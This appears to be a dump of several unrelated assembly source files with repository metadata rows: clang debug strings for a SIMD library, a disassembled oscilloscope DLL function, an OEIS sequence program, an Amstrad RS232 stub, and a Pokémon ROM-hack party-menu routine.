.asciz "ldiv_t" # string offset=3526
.Linfo_string307:
.asciz "abort" # string offset=3533
.Linfo_string308:
.asciz "aligned_alloc" # string offset=3539
.Linfo_string309:
.asciz "atexit" # string offset=3553
.Linfo_string310:
.asciz "at_quick_exit" # string offset=3560
.Linfo_string311:
.asciz "atof" # string offset=3574
.Linfo_string312:
.asciz "atoi" # string offset=3579
.Linfo_string313:
.asciz "atol" # string offset=3584
.Linfo_string314:
.asciz "bsearch" # string offset=3589
.Linfo_string315:
.asciz "__compar_fn_t" # string offset=3597
.Linfo_string316:
.asciz "calloc" # string offset=3611
.Linfo_string317:
.asciz "div" # string offset=3618
.Linfo_string318:
.asciz "exit" # string offset=3622
.Linfo_string319:
.asciz "free" # string offset=3627
.Linfo_string320:
.asciz "getenv" # string offset=3632
.Linfo_string321:
.asciz "labs" # string offset=3639
.Linfo_string322:
.asciz "ldiv" # string offset=3644
.Linfo_string323:
.asciz "malloc" # string offset=3649
.Linfo_string324:
.asciz "mblen" # string offset=3656
.Linfo_string325:
.asciz "mbstowcs" # string offset=3662
.Linfo_string326:
.asciz "mbtowc" # string offset=3671
.Linfo_string327:
.asciz "qsort" # string offset=3678
.Linfo_string328:
.asciz "quick_exit" # string offset=3684
.Linfo_string329:
.asciz "rand" # string offset=3695
.Linfo_string330:
.asciz "realloc" # string offset=3700
.Linfo_string331:
.asciz "srand" # string offset=3708
.Linfo_string332:
.asciz "strtod" # string offset=3714
.Linfo_string333:
.asciz "strtol" # string offset=3721
.Linfo_string334:
.asciz "strtoul" # string offset=3728
.Linfo_string335:
.asciz "system" # string offset=3736
.Linfo_string336:
.asciz "wcstombs" # string offset=3743
.Linfo_string337:
.asciz "wctomb" # string offset=3752
.Linfo_string338:
.asciz "lldiv_t" # string offset=3759
.Linfo_string339:
.asciz "_Exit" # string offset=3767
.Linfo_string340:
.asciz "llabs" # string offset=3773
.Linfo_string341:
.asciz "lldiv" # string offset=3779
.Linfo_string342:
.asciz "atoll" # string offset=3785
.Linfo_string343:
.asciz "strtoll" # string offset=3791
.Linfo_string344:
.asciz "strtoull" # string offset=3799
.Linfo_string345:
.asciz "strtof" # string offset=3808
.Linfo_string346:
.asciz "strtold" # string offset=3815
.Linfo_string347:
.asciz "_ZN9__gnu_cxx3divExx" # string offset=3823
.Linfo_string348:
.asciz "FILE" # string offset=3844
.Linfo_string349:
.asciz "_G_fpos_t" # string offset=3849
.Linfo_string350:
.asciz "__fpos_t" # string offset=3859
.Linfo_string351:
.asciz "fpos_t" # string offset=3868
.Linfo_string352:
.asciz "clearerr" # string offset=3875
.Linfo_string353:
.asciz "fclose" # string offset=3884
.Linfo_string354:
.asciz "feof" # string offset=3891
.Linfo_string355:
.asciz "ferror" # string offset=3896
.Linfo_string356:
.asciz "fflush" # string offset=3903
.Linfo_string357:
.asciz "fgetc" # string offset=3910
.Linfo_string358:
.asciz "fgetpos" # string offset=3916
.Linfo_string359:
.asciz "fgets" # string offset=3924
.Linfo_string360:
.asciz "fopen" # string offset=3930
.Linfo_string361:
.asciz "fprintf" # string offset=3936
.Linfo_string362:
.asciz "fputc" # string offset=3944
.Linfo_string363:
.asciz "fputs" # string offset=3950
.Linfo_string364:
.asciz "fread" # string offset=3956
.Linfo_string365:
.asciz "freopen" # string offset=3962
.Linfo_string366:
.asciz "__isoc99_fscanf" # string offset=3970
.Linfo_string367:
.asciz "fscanf" # string offset=3986
.Linfo_string368:
.asciz "fseek" # string offset=3993
.Linfo_string369:
.asciz "fsetpos" # string offset=3999
.Linfo_string370:
.asciz "ftell" # string offset=4007
.Linfo_string371:
.asciz "fwrite" # string offset=4013
.Linfo_string372:
.asciz "getc" # string offset=4020
.Linfo_string373:
.asciz "getchar" # string offset=4025
.Linfo_string374:
.asciz "perror" # string offset=4033
.Linfo_string375:
.asciz "printf" # string offset=4040
.Linfo_string376:
.asciz "putc" # string offset=4047
.Linfo_string377:
.asciz "putchar" # string offset=4052
.Linfo_string378:
.asciz "puts" # string offset=4060
.Linfo_string379:
.asciz "remove" # string offset=4065
.Linfo_string380:
.asciz "rename" # string offset=4072
.Linfo_string381:
.asciz "rewind" # string offset=4079
.Linfo_string382:
.asciz "__isoc99_scanf" # string offset=4086
.Linfo_string383:
.asciz "scanf" # string offset=4101
.Linfo_string384:
.asciz "setbuf" # string offset=4107
.Linfo_string385:
.asciz "setvbuf" # string offset=4114
.Linfo_string386:
.asciz "sprintf" # string offset=4122
.Linfo_string387:
.asciz "__isoc99_sscanf" # string offset=4130
.Linfo_string388:
.asciz "sscanf" # string offset=4146
.Linfo_string389:
.asciz "tmpfile" # string offset=4153
.Linfo_string390:
.asciz "tmpnam" # string offset=4161
.Linfo_string391:
.asciz "ungetc" # string offset=4168
.Linfo_string392:
.asciz "vfprintf" # string offset=4175
.Linfo_string393:
.asciz "vprintf" # string offset=4184
.Linfo_string394:
.asciz "vsprintf" # string offset=4192
.Linfo_string395:
.asciz "snprintf" # string offset=4201
.Linfo_string396:
.asciz "__isoc99_vfscanf" # string offset=4210
.Linfo_string397:
.asciz "vfscanf" # string offset=4227
.Linfo_string398:
.asciz "__isoc99_vscanf" # string offset=4235
.Linfo_string399:
.asciz "vscanf" # string offset=4251
.Linfo_string400:
.asciz "vsnprintf" # string offset=4258
.Linfo_string401:
.asciz "__isoc99_vsscanf" # string offset=4268
.Linfo_string402:
.asciz "vsscanf" # string offset=4285
.Linfo_string403:
.asciz "wctrans_t" # string offset=4293
.Linfo_string404:
.asciz "wctype_t" # string offset=4303
.Linfo_string405:
.asciz "iswalnum" # string offset=4312
.Linfo_string406:
.asciz "iswalpha" # string offset=4321
.Linfo_string407:
.asciz "iswblank" # string offset=4330
.Linfo_string408:
.asciz "iswcntrl" # string offset=4339
.Linfo_string409:
.asciz "iswctype" # string offset=4348
.Linfo_string410:
.asciz "iswdigit" # string offset=4357
.Linfo_string411:
.asciz "iswgraph" # string offset=4366
.Linfo_string412:
.asciz "iswlower" # string offset=4375
.Linfo_string413:
.asciz "iswprint" # string offset=4384
.Linfo_string414:
.asciz "iswpunct" # string offset=4393
.Linfo_string415:
.asciz "iswspace" # string offset=4402
.Linfo_string416:
.asciz "iswupper" # string offset=4411
.Linfo_string417:
.asciz "iswxdigit" # string offset=4420
.Linfo_string418:
.asciz "towctrans" # string offset=4430
.Linfo_string419:
.asciz "towlower" # string offset=4440
.Linfo_string420:
.asciz "towupper" # string offset=4449
.Linfo_string421:
.asciz "wctrans" # string offset=4458
.Linfo_string422:
.asciz "wctype" # string offset=4466
.Linfo_string423:
.asciz "max_align_t" # string offset=4473
.Linfo_string424:
.asciz "_ZSt3abse" # string offset=4485
.Linfo_string425:
.asciz "memchr" # string offset=4495
.Linfo_string426:
.asciz "memcmp" # string offset=4502
.Linfo_string427:
.asciz "memcpy" # string offset=4509
.Linfo_string428:
.asciz "memmove" # string offset=4516
.Linfo_string429:
.asciz "memset" # string offset=4524
.Linfo_string430:
.asciz "strcat" # string offset=4531
.Linfo_string431:
.asciz "strcmp" # string offset=4538
.Linfo_string432:
.asciz "strcoll" # string offset=4545
.Linfo_string433:
.asciz "strcpy" # string offset=4553
.Linfo_string434:
.asciz "strcspn" # string offset=4560
.Linfo_string435:
.asciz "strerror" # string offset=4568
.Linfo_string436:
.asciz "strlen" # string offset=4577
.Linfo_string437:
.asciz "strncat" # string offset=4584
.Linfo_string438:
.asciz "strncmp" # string offset=4592
.Linfo_string439:
.asciz "strncpy" # string offset=4600
.Linfo_string440:
.asciz "strspn" # string offset=4608
.Linfo_string441:
.asciz "strtok" # string offset=4615
.Linfo_string442:
.asciz "strxfrm" # string offset=4622
.Linfo_string443:
.asciz "strchr" # string offset=4630
.Linfo_string444:
.asciz "strpbrk" # string offset=4637
.Linfo_string445:
.asciz "strrchr" # string offset=4645
.Linfo_string446:
.asciz "strstr" # string offset=4653
.Linfo_string447:
.asciz "In" # string offset=4660
.Linfo_string448:
.asciz "Cardinal" # string offset=4663
.Linfo_string449:
.asciz "_Tp" # string offset=4672
.Linfo_string450:
.asciz "__v" # string offset=4676
.Linfo_string451:
.asciz "value" # string offset=4680
.Linfo_string452:
.asciz "_ZNKSt17integral_constantIlLl8EEcvlEv" # string offset=4686
.Linfo_string453:
.asciz "operator long" # string offset=4724
.Linfo_string454:
.asciz "value_type" # string offset=4738
.Linfo_string455:
.asciz "_ZNKSt17integral_constantIlLl8EEclEv" # string offset=4749
.Linfo_string456:
.asciz "operator()" # string offset=4786
.Linfo_string457:
.asciz "integral_constant<long, 8>" # string offset=4797
.Linfo_string458:
.asciz "_ZN3eve5fixedILl8EE7is_pow2El" # string offset=4824
.Linfo_string459:
.asciz "is_pow2" # string offset=4854
.Linfo_string460:
.asciz "ptrdiff_t" # string offset=4862
.Linfo_string461:
.asciz "fixed<8>" # string offset=4872
.Linfo_string462:
.asciz "N" # string offset=4881
.Linfo_string463:
.asciz "Out" # string offset=4883
.Linfo_string464:
.asciz "_ZN3eve6detail8convert_IsNS_5fixedILl8EEEiEENS_10avx_abi_v04wideIT1_T0_EERKNS0_7delay_tERKNS_4avx_ERKNS5_IT_S7_EERKNS_2asIS6_EE" # string offset=4887
.Linfo_string465:
.asciz "convert_<short, eve::fixed<8>, int>" # string offset=5015
.Linfo_string466:
.asciz "avx_abi_v0" # string offset=5051
.Linfo_string467:
.asciz "Type" # string offset=5062
.Linfo_string468:
.asciz "Size" # string offset=5067
.Linfo_string469:
.asciz "_ZN3eve6detail13wide_cardinalINS_5fixedILl8EEEE4sizeEv" # string offset=5072
.Linfo_string470:
.asciz "size" # string offset=5127
.Linfo_string471:
.asciz "size_type" # string offset=5132
.Linfo_string472:
.asciz "_ZN3eve6detail13wide_cardinalINS_5fixedILl8EEEE8max_sizeEv" # string offset=5142
.Linfo_string473:
.asciz "max_size" # string offset=5201
.Linfo_string474:
.asciz "_ZN3eve6detail13wide_cardinalINS_5fixedILl8EEEE5emptyEv" # string offset=5210
.Linfo_string475:
.asciz "empty" # string offset=5266
.Linfo_string476:
.asciz "wide_cardinal<eve::fixed<8> >" # string offset=5272
.Linfo_string477:
.asciz "Storage" # string offset=5302
.Linfo_string478:
.asciz "data_" # string offset=5310
.Linfo_string479:
.asciz "wide_storage" # string offset=5316
.Linfo_string480:
.asciz "storage_type" # string offset=5329
.Linfo_string481:
.asciz "_ZNKR3eve6detail12wide_storageIDv4_xE7storageEv" # string offset=5342
.Linfo_string482:
.asciz "storage" # string offset=5390
.Linfo_string483:
.asciz "_ZNR3eve6detail12wide_storageIDv4_xE7storageEv" # string offset=5398
.Linfo_string484:
.asciz "_ZNO3eve6detail12wide_storageIDv4_xE7storageEv" # string offset=5445
.Linfo_string485:
.asciz "_ZNKR3eve6detail12wide_storageIDv4_xEcvRKS2_Ev" # string offset=5492
.Linfo_string486:
.asciz "operator __attribute__((__vector_size__(4 * sizeof(long long)))) long long const &" # string offset=5539
.Linfo_string487:
.asciz "_ZNR3eve6detail12wide_storageIDv4_xEcvRS2_Ev" # string offset=5622
.Linfo_string488:
.asciz "operator __attribute__((__vector_size__(4 * sizeof(long long)))) long long &" # string offset=5667
.Linfo_string489:
.asciz "_ZNO3eve6detail12wide_storageIDv4_xEcvS2_Ev" # string offset=5744
.Linfo_string490:
.asciz "operator __attribute__((__vector_size__(4 * sizeof(long long)))) long long" # string offset=5788
.Linfo_string491:
.asciz "wide_storage<__attribute__((__vector_size__(4 * sizeof(long long)))) long long>" # string offset=5863
.Linfo_string492:
.asciz "wide" # string offset=5943
.Linfo_string493:
.asciz "_ZNR3eve10avx_abi_v04wideIiNS_5fixedILl8EEEEaSERKS4_" # string offset=5948
.Linfo_string494:
.asciz "_ZN3eve10avx_abi_v04wideIiNS_5fixedILl8EEEEaSERKDv4_x" # string offset=6001
.Linfo_string495:
.asciz "_ZN3eve10avx_abi_v04wideIiNS_5fixedILl8EEEE4swapERS4_" # string offset=6055
.Linfo_string496:
.asciz "_ZN3eve10avx_abi_v04wideIiNS_5fixedILl8EEEEppEv" # string offset=6109
.Linfo_string497:
.asciz "operator++" # string offset=6157
.Linfo_string498:
.asciz "_ZN3eve10avx_abi_v04wideIiNS_5fixedILl8EEEEmmEv" # string offset=6168
.Linfo_string499:
.asciz "operator--" # string offset=6216
.Linfo_string500:
.asciz "_ZN3eve10avx_abi_v04wideIiNS_5fixedILl8EEEEppEi" # string offset=6227
.Linfo_string501:
.asciz "_ZN3eve10avx_abi_v04wideIiNS_5fixedILl8EEEEmmEi" # string offset=6275
.Linfo_string502:
.asciz "wide<int, eve::fixed<8> >" # string offset=6323
.Linfo_string503:
.asciz "delay_t" # string offset=6349
.Linfo_string504:
.asciz "cpu_" # string offset=6357
.Linfo_string505:
.asciz "simd_" # string offset=6362
.Linfo_string506:
.asciz "sse2_" # string offset=6368
.Linfo_string507:
.asciz "sse3_" # string offset=6374
.Linfo_string508:
.asciz "ssse3_" # string offset=6380
.Linfo_string509:
.asciz "sse4_1_" # string offset=6387
.Linfo_string510:
.asciz "sse4_2_" # string offset=6395
.Linfo_string511:
.asciz "avx_" # string offset=6403
.Linfo_string512:
.asciz "v0" # string offset=6408
.Linfo_string513:
.asciz "_ZNKR3eve6detail12wide_storageIDv2_xE7storageEv" # string offset=6411
.Linfo_string514:
.asciz "_ZNR3eve6detail12wide_storageIDv2_xE7storageEv" # string offset=6459
.Linfo_string515:
.asciz "_ZNO3eve6detail12wide_storageIDv2_xE7storageEv" # string offset=6506
.Linfo_string516:
.asciz "_ZNKR3eve6detail12wide_storageIDv2_xEcvRKS2_Ev" # string offset=6553
.Linfo_string517:
.asciz "operator __attribute__((__vector_size__(2 * sizeof(long long)))) long long const &" # string offset=6600
.Linfo_string518:
.asciz "_ZNR3eve6detail12wide_storageIDv2_xEcvRS2_Ev" # string offset=6683
.Linfo_string519:
.asciz "operator __attribute__((__vector_size__(2 * sizeof(long long)))) long long &" # string offset=6728
.Linfo_string520:
.asciz "_ZNO3eve6detail12wide_storageIDv2_xEcvS2_Ev" # string offset=6805
.Linfo_string521:
.asciz "operator __attribute__((__vector_size__(2 * sizeof(long long)))) long long" # string offset=6849
.Linfo_string522:
.asciz "wide_storage<__attribute__((__vector_size__(2 * sizeof(long long)))) long long>" # string offset=6924
.Linfo_string523:
.asciz "_ZNR3eve10avx_abi_v04wideIsNS_5fixedILl8EEEEaSERKS4_" # string offset=7004
.Linfo_string524:
.asciz "_ZN3eve10avx_abi_v04wideIsNS_5fixedILl8EEEEaSERKDv2_x" # string offset=7057
.Linfo_string525:
.asciz "_ZN3eve10avx_abi_v04wideIsNS_5fixedILl8EEEE4swapERS4_" # string offset=7111
.Linfo_string526:
.asciz "_ZN3eve10avx_abi_v04wideIsNS_5fixedILl8EEEEppEv" # string offset=7165
.Linfo_string527:
.asciz "_ZN3eve10avx_abi_v04wideIsNS_5fixedILl8EEEEmmEv" # string offset=7213
.Linfo_string528:
.asciz "_ZN3eve10avx_abi_v04wideIsNS_5fixedILl8EEEEppEi" # string offset=7261
.Linfo_string529:
.asciz "_ZN3eve10avx_abi_v04wideIsNS_5fixedILl8EEEEmmEi" # string offset=7309
.Linfo_string530:
.asciz "wide<short, eve::fixed<8> >" # string offset=7357
.Linfo_string531:
.asciz "tgt" # string offset=7385
.Linfo_string532:
.asciz "T" # string offset=7389
.Linfo_string533:
.asciz "as" # string offset=7391
.Linfo_string534:
.asciz "as<int>" # string offset=7394
.Linfo_string535:
.asciz "Arg" # string offset=7402
.Linfo_string536:
.asciz "Args" # string offset=7406
.Linfo_string537:
.asciz "_ZN3eve6detail15callable_objectINS_3tag8convert_EvE4callIRNS_10avx_abi_v04wideIsNS_5fixedILl8EEEEEJRNS_2asIiEEEEEDaOT_DpOT0_" # string offset=7411
.Linfo_string538:
.asciz "call<eve::wide<short, eve::fixed<8> > &, eve::as<int> &>" # string offset=7536
.Linfo_string539:
.asciz "d" # string offset=7593
.Linfo_string540:
.asciz "args" # string offset=7595
.Linfo_string541:
.asciz "_ZNK3eve6detail15callable_objectINS_3tag8convert_EvEclIJNS_10avx_abi_v04wideIsNS_5fixedILl8EEEEENS_2asIiEEEEEDaDpOT_" # string offset=7600
.Linfo_string542:
.asciz "operator()<eve::wide<short, eve::fixed<8> >, eve::as<int> >" # string offset=7717
.Linfo_string543:
.asciz "auto" # string offset=7777
.Linfo_string544:
.asciz "this" # string offset=7782
.Linfo_string545:
.asciz "IN" # string offset=7787
.Linfo_string546:
.asciz "OUT" # string offset=7790
.Linfo_string547:
.asciz "_ZN3eve6detail8convert_INS_10avx_abi_v04wideIsNS_5fixedILl8EEEEEjEEDaRKNS0_7delay_tERKNS_4cpu_ERKNS_7logicalIT_EERKNS_2asINSD_IT0_EEEE" # string offset=7794
.Linfo_string548:
.asciz "convert_<eve::wide<short, eve::fixed<8> >, unsigned int>" # string offset=7929
.Linfo_string549:
.asciz "_ZNR3eve10avx_abi_v04wideIjNS_5fixedILl8EEEEaSERKS4_" # string offset=7986
.Linfo_string550:
.asciz "_ZN3eve10avx_abi_v04wideIjNS_5fixedILl8EEEEaSERKDv4_x" # string offset=8039
.Linfo_string551:
.asciz "_ZN3eve10avx_abi_v04wideIjNS_5fixedILl8EEEE4swapERS4_" # string offset=8093
.Linfo_string552:
.asciz "_ZN3eve10avx_abi_v04wideIjNS_5fixedILl8EEEEppEv" # string offset=8147
.Linfo_string553:
.asciz "_ZN3eve10avx_abi_v04wideIjNS_5fixedILl8EEEEmmEv" # string offset=8195
.Linfo_string554:
.asciz "_ZN3eve10avx_abi_v04wideIjNS_5fixedILl8EEEEppEi" # string offset=8243
.Linfo_string555:
.asciz "_ZN3eve10avx_abi_v04wideIjNS_5fixedILl8EEEEmmEi" # string offset=8291
.Linfo_string556:
.asciz "wide<unsigned int, eve::fixed<8> >" # string offset=8339
.Linfo_string557:
.asciz "logical" # string offset=8374
.Linfo_string558:
.asciz "_ZNR3eve7logicalINS_10avx_abi_v04wideIjNS_5fixedILl8EEEEEEaSERKS6_" # string offset=8382
.Linfo_string559:
.asciz "_ZN3eve7logicalINS_10avx_abi_v04wideIjNS_5fixedILl8EEEEEEaSENS0_IjEE" # string offset=8449
.Linfo_string560:
.asciz "true_mask" # string offset=8518
.Linfo_string561:
.asciz "Sign" # string offset=8528
.Linfo_string562:
.asciz "as_integer<unsigned int, unsigned int>" # string offset=8533
.Linfo_string563:
.asciz "make_integer<4, unsigned int>" # string offset=8572
.Linfo_string564:
.asciz "type" # string offset=8602
.Linfo_string565:
.asciz "make_integer_t<sizeof(unsigned int), unsigned int>" # string offset=8607
.Linfo_string566:
.asciz "as_integer_t<unsigned int, unsigned int>" # string offset=8658
.Linfo_string567:
.asciz "bits_type" # string offset=8699
.Linfo_string568:
.asciz "false_mask" # string offset=8709
.Linfo_string569:
.asciz "value_" # string offset=8720
.Linfo_string570:
.asciz "_ZNR3eve7logicalIjEaSERKS1_" # string offset=8727
.Linfo_string571:
.asciz "_ZNR3eve7logicalIjEaSEb" # string offset=8755
.Linfo_string572:
.asciz "_ZNK3eve7logicalIjEntEv" # string offset=8779
.Linfo_string573:
.asciz "operator!" # string offset=8803
.Linfo_string574:
.asciz "_ZNK3eve7logicalIjEcvbEv" # string offset=8813
.Linfo_string575:
.asciz "_ZNK3eve7logicalIjE5valueEv" # string offset=8838
.Linfo_string576:
.asciz "_ZN3eve7logicalIjE4swapERS1_" # string offset=8866
.Linfo_string577:
.asciz "logical<unsigned int>" # string offset=8895
.Linfo_string578:
.asciz "_ZN3eve7logicalINS_10avx_abi_v04wideIjNS_5fixedILl8EEEEEEaSEb" # string offset=8917
.Linfo_string579:
.asciz "_ZN3eve7logicalINS_10avx_abi_v04wideIjNS_5fixedILl8EEEEEEaSERKDv4_x" # string offset=8979
.Linfo_string580:
.asciz "_ZN3eve7logicalINS_10avx_abi_v04wideIjNS_5fixedILl8EEEEEE4swapERS6_" # string offset=9047
.Linfo_string581:
.asciz "logical<eve::wide<unsigned int, eve::fixed<8> > >" # string offset=9115
.Linfo_string582:
.asciz "_ZNR3eve7logicalINS_10avx_abi_v04wideIsNS_5fixedILl8EEEEEEaSERKS6_" # string offset=9165
.Linfo_string583:
.asciz "_ZN3eve7logicalINS_10avx_abi_v04wideIsNS_5fixedILl8EEEEEEaSENS0_IsEE" # string offset=9232
.Linfo_string584:
.asciz "logical<short>" # string offset=9301
.Linfo_string585:
.asciz "_ZN3eve7logicalINS_10avx_abi_v04wideIsNS_5fixedILl8EEEEEEaSEb" # string offset=9316
.Linfo_string586:
.asciz "_ZN3eve7logicalINS_10avx_abi_v04wideIsNS_5fixedILl8EEEEEEaSERKDv2_x" # string offset=9378
.Linfo_string587:
.asciz "_ZN3eve7logicalINS_10avx_abi_v04wideIsNS_5fixedILl8EEEEEE4swapERS6_" # string offset=9446
.Linfo_string588:
.asciz "logical<eve::wide<short, eve::fixed<8> > >" # string offset=9514
.Linfo_string589:
.asciz "as<eve::logical<unsigned int> >" # string offset=9557
.Linfo_string590:
.asciz "_ZN3eve6detail8convert_IsNS_5fixedILl8EEEjEENS_7logicalINS_10avx_abi_v04wideIT1_T0_EEEERKNS0_7delay_tERKNS_5sse2_ERKNS4_INS6_IT_S8_EEEERKNS_2asINS4_IS7_EEEE" # string offset=9589
.Linfo_string591:
.asciz "convert_<short, eve::fixed<8>, unsigned int>" # string offset=9746
.Linfo_string592:
.asciz "c" # string offset=9791
.Linfo_string593:
.asciz "_ZN3eve6detail15callable_objectINS_3tag8convert_EvE4callIRNS_7logicalINS_10avx_abi_v04wideIsNS_5fixedILl8EEEEEEEJRNS_2asINS6_IjEEEEEEEDaOT_DpOT0_" # string offset=9793
.Linfo_string594:
.asciz "call<eve::logical<eve::wide<short, eve::fixed<8> > > &, eve::as<eve::logical<unsigned int> > &>" # string offset=9939
.Linfo_string595:
.asciz "_ZNK3eve6detail15callable_objectINS_3tag8convert_EvEclIJRNS_7logicalINS_10avx_abi_v04wideIsNS_5fixedILl8EEEEEEENS_2asINS6_IjEEEEEEEDaDpOT_" # string offset=10035
.Linfo_string596:
.asciz "operator()<eve::logical<eve::wide<short, eve::fixed<8> > > &, eve::as<eve::logical<unsigned int> > >" # string offset=10174
.Linfo_string597:
.asciz "_Z3cvtN3eve7logicalINS_10avx_abi_v04wideIsNS_5fixedILl8EEEEEEE" # string offset=10275
.Linfo_string598:
.asciz "cvt" # string offset=10338
.Linfo_string599:
.asciz "x" # string offset=10342
.ident "clang version 12.0.1 (https://github.com/llvm/llvm-project.git fed41342a82f5a3a9201819a82bf7a48313e296b)"
.section ".note.GNU-stack","",@progbits
.addrsig
.addrsig_sym __gxx_personality_v0
.section .debug_line,"",@progbits
.Lline_table_start0:
| 59.730823 | 187 | 0.436274 |
8d184cafbb48480b0276c38cc794eefc9af58174 | 744 | asm | Assembly | library/02_functions_batch1/GetRawData4Read.asm | SamantazFox/dds140-reverse-engineering | 4c8c286ffc20f2ee07061c83b0a0a68204d90148 | [
"Unlicense"
] | 1 | 2021-06-05T23:41:15.000Z | 2021-06-05T23:41:15.000Z | library/02_functions_batch1/GetRawData4Read.asm | SamantazFox/dds140-reverse-engineering | 4c8c286ffc20f2ee07061c83b0a0a68204d90148 | [
"Unlicense"
] | null | null | null | library/02_functions_batch1/GetRawData4Read.asm | SamantazFox/dds140-reverse-engineering | 4c8c286ffc20f2ee07061c83b0a0a68204d90148 | [
"Unlicense"
] | null | null | null | 10001200: 83 7c 24 04 00 cmp DWORD PTR [esp+0x4],0x0
10001205: b8 10 10 01 10 mov eax,0x10011010
1000120a: 74 05 je 0x10001211
1000120c: b8 10 32 01 10 mov eax,0x10013210
10001211: c2 04 00 ret 0x4
10001214: cc int3
10001215: cc int3
10001216: cc int3
10001217: cc int3
10001218: cc int3
10001219: cc int3
1000121a: cc int3
1000121b: cc int3
1000121c: cc int3
1000121d: cc int3
1000121e: cc int3
1000121f: cc int3
| 41.333333 | 62 | 0.427419 |
65a2f1098d86f7e9ab6019fb2c1c5d43456d5a6d | 680 | asm | Assembly | oeis/064/A064335.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/064/A064335.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/064/A064335.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A064335: a(n) = 6*(2*n)!/(n+2).
; Submitted by Jon Maiga
; 3,4,36,864,40320,3110400,359251200,58118860800,12553673932800,3492203839488000,1216451004088320000,518769566666588160000,265906457885674045440000,161316584450642254233600000,114333129229392697688064000000,93618656404302726577520640000000,87710278977897843389072670720000000,93231410223032886583458508308480000000,111597998036970365240399834445250560000000,149435033561886031931430635457164083200000000,222522349976699382094257618980758880256000000000
mov $1,$0
mul $0,2
seq $0,142 ; Factorial numbers: n! = 1*2*3*4*...*n (order of symmetric group S_n, number of permutations of n letters).
mul $0,6
add $1,2
div $0,$1
| 61.818182 | 452 | 0.839706 |
aa82f8dcd2315684ebfd8524a4c0b8e9063e61a6 | 287 | asm | Assembly | libsrc/rs232/cpc/sti/rs232_init.asm | andydansby/z88dk-mk2 | 51c15f1387293809c496f5eaf7b196f8a0e9b66b | [
"ClArtistic"
] | 1 | 2020-09-15T08:35:49.000Z | 2020-09-15T08:35:49.000Z | libsrc/rs232/cpc/sti/rs232_init.asm | andydansby/z88dk-MK2 | 51c15f1387293809c496f5eaf7b196f8a0e9b66b | [
"ClArtistic"
] | null | null | null | libsrc/rs232/cpc/sti/rs232_init.asm | andydansby/z88dk-MK2 | 51c15f1387293809c496f5eaf7b196f8a0e9b66b | [
"ClArtistic"
] | null | null | null | ;
; z88dk RS232 Function
;
; Amstrad CPC (STI) version
;
; unsigned char rs232_init()
;
; $Id: rs232_init.asm,v 1.2 2008/06/05 14:31:24 stefano Exp $
XLIB rs232_init
rs232_init:
ld hl,0 ;RS_ERR_OK;
ret
| 17.9375 | 67 | 0.498258 |
09fb431435e83a8b76236eb11bbb67de916ca728 | 12,476 | asm | Assembly | engine/pokemon/party_menu.asm | AtmaBuster/pokeplat-gen2 | fa83b2e75575949b8f72cb2c48f7a1042e97f70f | [
"blessing"
] | 6 | 2021-06-19T06:41:19.000Z | 2022-02-15T17:12:33.000Z | engine/pokemon/party_menu.asm | AtmaBuster/pokeplat-gen2-old | 01e42c55db5408d72d89133dc84a46c699d849ad | [
"blessing"
] | null | null | null | engine/pokemon/party_menu.asm | AtmaBuster/pokeplat-gen2-old | 01e42c55db5408d72d89133dc84a46c699d849ad | [
"blessing"
] | 3 | 2021-01-15T18:45:40.000Z | 2021-10-16T03:35:27.000Z | SelectMonFromParty:
call DisableSpriteUpdates
xor a
ld [wPartyMenuActionText], a
call ClearBGPalettes
call InitPartyMenuLayout
call WaitBGMap
call SetPalettes
call DelayFrame
call PartyMenuSelect
call ReturnToMapWithSpeechTextbox
ret
SelectTradeOrDayCareMon:
ld a, b
ld [wPartyMenuActionText], a
call DisableSpriteUpdates
call ClearBGPalettes
call InitPartyMenuLayout
call WaitBGMap
ld b, SCGB_PARTY_MENU
call GetSGBLayout
call SetPalettes
call DelayFrame
call PartyMenuSelect
call ReturnToMapWithSpeechTextbox
ret
InitPartyMenuLayout:
call LoadPartyMenuGFX
call InitPartyMenuWithCancel
call InitPartyMenuGFX
call WritePartyMenuTilemap
call PrintPartyMenuText
ret
LoadPartyMenuGFX:
call LoadFontsBattleExtra
callfar InitPartyMenuPalettes ; engine/color.asm
callfar ClearSpriteAnims2
ret
WritePartyMenuTilemap:
ld hl, wOptions
ld a, [hl]
push af
set NO_TEXT_SCROLL, [hl]
xor a
ldh [hBGMapMode], a
hlcoord 0, 0
ld bc, SCREEN_WIDTH * SCREEN_HEIGHT
ld a, " "
call ByteFill ; blank the tilemap
call GetPartyMenuQualityIndexes
.loop
ld a, [hli]
cp -1
jr z, .end
push hl
ld hl, .Jumptable
rst JumpTable
pop hl
jr .loop
.end
pop af
ld [wOptions], a
ret
.Jumptable:
; entries correspond to PARTYMENUQUALITY_* constants
dw PlacePartyNicknames
dw PlacePartyHPBar
dw PlacePartyMenuHPDigits
dw PlacePartyMonLevel
dw PlacePartyMonStatus
dw PlacePartyMonTMHMCompatibility
dw PlacePartyMonEvoStoneCompatibility
dw PlacePartyMonGender
dw PlacePartyMonMobileBattleSelection
PlacePartyNicknames:
hlcoord 3, 1
ld a, [wPartyCount]
and a
jr z, .end
ld c, a
ld b, 0
.loop
push bc
push hl
push hl
ld hl, wPartyMonNicknames
ld a, b
call GetNick
pop hl
call PlaceString
pop hl
ld de, 2 * SCREEN_WIDTH
add hl, de
pop bc
inc b
dec c
jr nz, .loop
.end
dec hl
dec hl
ld de, .CANCEL
call PlaceString
ret
.CANCEL:
db "CANCEL@"
PlacePartyHPBar:
xor a
ld [wSGBPals], a
ld a, [wPartyCount]
and a
ret z
ld c, a
ld b, 0
hlcoord 11, 2
.loop
push bc
push hl
call PartyMenuCheckEgg
jr z, .skip
push hl
call PlacePartymonHPBar
pop hl
ld d, $6
ld b, $0
call DrawBattleHPBar
ld hl, wHPPals
ld a, [wSGBPals]
ld c, a
ld b, $0
add hl, bc
call SetHPPal
ld b, SCGB_PARTY_MENU_HP_PALS
call GetSGBLayout
.skip
ld hl, wSGBPals
inc [hl]
pop hl
ld de, 2 * SCREEN_WIDTH
add hl, de
pop bc
inc b
dec c
jr nz, .loop
ld b, SCGB_PARTY_MENU
call GetSGBLayout
ret
PlacePartymonHPBar:
